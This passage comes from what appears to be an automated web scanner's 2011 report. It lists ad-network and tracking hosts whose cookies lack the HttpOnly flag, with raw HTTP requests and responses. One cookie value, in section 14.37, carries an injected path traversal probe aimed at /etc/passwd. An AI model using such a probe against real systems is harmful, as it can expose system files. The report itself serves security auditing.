Set-Cookie: rsiPus_Ny38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1tW9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nn6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RSEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OkuD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9izr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Qh75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+DPwIU1E3iGYqC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeSFdjLp9DlTHNdGEjk0NgfVVxKB0nEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODlMOfrBlcpc/EVLjRSLRI8xjjkWUcghoozYMgm/2kBMR53HBmxFjQP21MJ6qziGy5KFhz2qPm8ZgoK1+g0XpR3Kmq3TMLtl541XiOq/36oUo4MMjpuSJ2y6bPEnEG4RNytq5QtjHrtihooQg0m/lM9wDkKucEZSkzX6We4wXeCOgPS/A7BkgZy4dkUCe4edTyMDn8fmzBehL604nI2WXe85cUQ528Q14Mxu+aNOLf9YTzBvNBA1KAIjb0O0Oi+VN4FyjgQ40clMB9mqvwoFps3YOlPjPNsS2F22gQ0ivIIHmWn30Wq88O2srD/dCkj0Oq6ZssNV3f5ACcOIA0D6ZRxJO4Y/m8AWjXZYq4CFnEAlfd0xA70nDa0Q06zNeeQaAGZwXSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1U1sBdJZ2TSEDKubr3jIuyeiHnV6czpfJN1f8orwva/UxRbG+LRbtTY2aEs6IY/TFsITJhj8EcKApWf9WLDkqxqP9jKe9KyQx0p8UjOe+FaH0SYBdgFXAEYUAyiJn6mQbIXwpc07tmy/OujBCnSzBh9l3JW67FffY5JV4bQSgkB8PsS+t2xidb1ikY/pSzxxHBee0GB"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.24. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_LRgg="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYN/uRo6Id0hREh+v8Fc2uaokZKJpx2IXRk9Dyfi2c1aOHwzLio/qTPpYwOAxf+gMWWRw/SfZW0XEPOmFgqfwHDvNqdtPLRpDPvktgUQxq/DIIEL8fjYOTDXguU+JUnX8LmFcFTLYjxY+AM+B/tNXVIestR1daPcVjXKw1W/g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371lz7qzCPyctfVDXpp0hSLiyOnv8o9V31fTGzYVlly8cr+J2K6AddxvkNjEpT97+05FckBCjXgdMoWcJ+ZDwmTcmvYnaIAWGslXxRlOjyV0yAeF49BvV5wpBw+PAcJGEfuZqf4tqqccxTORX1uqAjTGan1Zaz6sFHSlwFp9OFyA4PCX928q9pyfVSQRHvdV31dgthTb9Tyj7QSV2cVknMw9iw649LdmB7mpU66PajssRrBK7SjdCY/Fc73BkSDCyvcG6h+2s3Rt1jQ1ejpGNd69FB3C193XxQSRJf/9mRpMOHWv3eViIHmLFWqfTR/A9H7j8Ukx49aPa+dnzBItPPH3YI0uFs+fk7r+LK0MsXGwZ6wpkhH6IuoSqStg2Aaiv0cH31+GRBoyUfk+adg2PbI3InOF5nzOD+I2/xJydlfQMPtwuA9UYTbCsXIcrSmc67UaV3jvPM+4TXQzLpbyfcpZBKQKB8AYEiR7n1+LKzfrBKhl5y4Sc9k1WiHRpD777eKMmrZeEtBMENXnfe2BlxJcMS4rhLvBKA7Yrct30ge2qHzHI1b2bguElaKc1LSFhqx1hLlZwnMVqJAHyTZDnILEGYiEYpJiilDTMdLfeZkUYBVO+VUbqM9MrKfDS7bhBjMDE4uZ0EqktoLuwbm2/ctzNmKdD+ZCVwx4yJoyJuU9j2tFkezn2g5+nd76Mb2XYD7FOwIdAEw5JNzYOU16pgQ9bX0MN0m4vYcg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.25. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_UF3V="MLtXrlEusS9roBD3ElioJsiF6sySUVfem3F3zgv5P+XsmyQaJ+0k7MGOSKJRnNlEyGtzHzk5mDju5hlW5NwWJNSy3FWGQChLCmu5FMT9Fpo1Qcv041wsRTflypSLkJ9eQVhctxoj+x1apTdBCWH42nprnPYbIoWxazGLrb/KD+A5h23Q0hhqnxgFbPS1+lDgrNtLaBhIM2vP3nBqmfmrq1mj+YZOVMIzdjtBBdiMduSHmogIVaKDrQjT5pWjfsXtP6NGQRew48EHjwAjj9+t2ahbA5RGrgTOQjNT/WZbiGxd3KiLH2//jU2CDyuU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1r+MwYFC/diQV0kvz1kXs5mm0b3NdNCaOJe4OMJnDsXCU/hoHR2Abd2814IP+LIsrai4Yeh5Y0b3GwI4FFOSN1pRQxzRy73LRLfWWczJlclKL0YNSVo4OI3RgHMG1353gA+Hdp4ovXbfdxfWv1Ykr1+sCStqlQSeDxIQQumHRevQ4SeMBODBch2StTKbY2p5nlakA9re0+3BYs0u9gWSSwIbIJkxcG5ogg5E3tctFd4ReQGR8KRyvC2x+KBCDqcekX89iIvSozn8HiXJFmHHE8NEO4/G/KdZ4ff0JA8T4Ns7xfEx3pY/7Wt2Ka+vWmG33A2ZKoTSIISDcv+LD6tT4NDiXv9Q9BNVPgnMb8XATn5qdr8B0D/F1FCSeVU43iTFd1mC4TuTJftcD/tLlKJ4jmc6hI5Npr9OrUSP52wZe2wowk5xduhRsMYjWHa8sZNT/dZFkt88Ur9WOL+BtORTARMAsRYu07WlIbycCqF6vvDaGzoV7mmDYvyM36GYYVHm7vA97cCzmm6IVzvvI7ycJ+epIsWZ6d06Ef1Aw0GEEJMdoGTSmI/l3n7FBpb6t6wCom+EmxAZUpePMxG7dr1Ub81+ViLpEMDWKnZs6O0QPFj/3MNG2ZbiCMMzG4XfB9FLf6spCLQI7T1XUr0XWWETCpu86hDI21eINnnsXn6SeFYsT9eVs0XJgaxEUuIf0mSjMrOz9mHfpLVpxt/RS/SeaCsdix7dv7hRcKjm3ARs9Qyb5nQsCmKf9dBR800OsZgIsYGSF5Ust4vDhmMds4TifQL15E+hDyvfMEO+XuMXKnVam3C/mFzIhO9jPkTqcROZyhbhYldHgHUGcds48vJS469Z0JxkwGELcG35QWwIalJEG"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.26. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; expires=Sun, 02-Oct-2011 00:45:08 GMT; path=/; domain=.undertone.com
UTID=4a03b50017dd46ddaa511cbfbfb29e688473407c8c4fce8899adcc4b; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/
UTLIA=239096.lqz3aw-13473; expires=Tue, 04-Oct-2011 00:45:08 GMT; path=/
UTPROFILES=15221%2317%3A1%2C28%7C1022%3A1%7C1023%3A1%7C4209%3A1; expires=Sat, 03-Dec-2011 00:45:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.27. http://ads.undertone.com/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/
UTPROFILES=15221%2317%3A1%2C35%7C1022%3A1%2C2%7C1023%3A1%2C2%7C4209%3A1%2C2; expires=Sat, 03-Dec-2011 00:45:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T,6741 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTPROFILES=15221%2317%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:45:13 GMT
Connection: close
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/
Set-Cookie: UTPROFILES=15221%2317%3A1%2C35%7C1022%3A1%2C2%7C1023%3A1%2C2%7C4209%3A1%2C2; expires=Sat, 03-Dec-2011 00:45:13 GMT; path=/

GIF89a.............!.......,...........D..;

14.28. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[239096]=lqz3fd-13473; expires=Tue, 04-Oct-2011 00:45:13 GMT; path=/
UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=239096&campaignid=45394&zoneid=13473&UTLIA=1&cb=0137d6006cde4f87928e17a0e65cf019&bk=lqz3av&id=9b717gcon8jpjqppi0uei5mr5 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; UTID=4a03b50017dd46ddaa511cbfbfb29e68; UTPROFILES=15221%2317%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:45:13 GMT
Connection: close
Set-Cookie: _UTLIA[239096]=lqz3fd-13473; expires=Tue, 04-Oct-2011 00:45:13 GMT; path=/
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; expires=Mon, 03-Sep-2012 00:45:13 GMT; path=/

GIF89a.............!.......,...........D..;

14.29. http://ak1.abmr.net/is/ads.undertone.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/ads.undertone.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-F6248E50D3C9B20BFFF9EB5EA664B56B73DB880669BDB36D0AED2F292EE60908-3CC9ECB738DC6097BABD3A5783E7E50840BA1F5253AE728A47DC91643B7FE4A9; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.30. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-159DEC38549F1F614D8A2426086D786875EEE45322C9F9736F0A6F6D9BF2D701-1607A532E50134DBA4C933F2985A2049EDBF2DD011F46699E08DEA173165718C; expires=Mon, 03-Sep-2012 01:01:16 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.31. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUm1bPVkNOW1aj5XcunNcMDa7Re6IGD4lHbY24BlLWUpAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJP31qI3sBpawEVUJBxdqAyC8xfc9PPC4jRiscMdipXP44sTMcaVpEYlLIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.32. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guest_id=v1%3A131509931699548357; domain=.twitter.com; path=/; expires=Tue, 03 Sep 2013 13:21:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.33. http://ar.atwola.com/atd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.atwola.com
Path:	/atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cords=MToxMzE1MDk3MDg4OjUsMTMxNTA5NzA4ODo3LDA=; domain=.ar.atwola.com; path=/; expires=Mon, 02 Jan 2012 00:44:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8q DAV/2
Expires: Sun, 04 Sep 2011 00:44:48 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzE1MDk3MDg4OjUsMTMxNTA5NzA4ODo3LDA=; domain=.ar.atwola.com; path=/; expires=Mon, 02 Jan 2012 00:44:48 GMT
Location: http://adadvisor.net/adscores/g.pixel?sid=9201047028&rand=913389
Content-Length: 0
Content-Type: text/plain

14.34. http://as.casalemedia.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 01:02:07 GMT
CMST=TmLJ305izg8C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT
CMDD=AAF1owI*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.35. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:42:17 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.36. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.37. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:08:16 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.38. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

V=LZLz3N9wRgPO; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 01:21:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/rtset HTTP/1.1
Host: bh.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.39. http://bookmarks.yahoo.com/myresults/bookmarklet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bookmarks.yahoo.com
Path:	/myresults/bookmarklet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BM=s=jTB8wJ2La_ypD_4dYi2T3iXing3SP9.2WWYx6ZV4prGAsqH7FIEnvrDQAopmUuavjvNvoLA_bTeCAOSco_5Ah3PnDWTo_giw8qyah_q73iAkoo2jYZ6qOZyOiL5BCew6c0xSCdTbNV_7IyclnoWj&u=3fCXYyeLa_wYLv83APMX2Lbttc9K4k.mD1iQ3DrhqFxeRyTWpsjWq8byJg--; path=/; domain=.bookmarks.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myresults/bookmarklet HTTP/1.1
Host: bookmarks.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:22:00 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: https://login.yahoo.com/config/login?.src=bmk2&.intl=us&.done=http%3A%2F%2Fbookmarks.yahoo.com%2Fmyresults%2Fbookmarklet
Set-Cookie: BM=s=jTB8wJ2La_ypD_4dYi2T3iXing3SP9.2WWYx6ZV4prGAsqH7FIEnvrDQAopmUuavjvNvoLA_bTeCAOSco_5Ah3PnDWTo_giw8qyah_q73iAkoo2jYZ6qOZyOiL5BCew6c0xSCdTbNV_7IyclnoWj&u=3fCXYyeLa_wYLv83APMX2Lbttc9K4k.mD1iQ3DrhqFxeRyTWpsjWq8byJg--; path=/; domain=.bookmarks.yahoo.com
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><meta http-equiv="refresh" content="0;url=https://login.yahoo.com/config/login?.src=bmk2&.intl=us&.done=http%3A%2F%2Fbookmarks.yahoo.com%2Fmyresults%2Fbookmarklet"/></head></html><
...[SNIP]...

14.40. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFad=2:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.41. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=196
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:47 GMT
Content-Length: 910
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b';
...[SNIP]...

14.42. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PI=h639958Za722607Zc305000825,305000825Zs263Zt1246;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.43. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

None;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=None;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: None;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=None;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=443
Date: Sun, 04 Sep 2011 01:22:07 GMT
Connection: close

14.44. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=1_1315099337_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
cre=1_1315099337_34024:68292:2:121174:121256; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
clk=1_1315099337; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.45. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

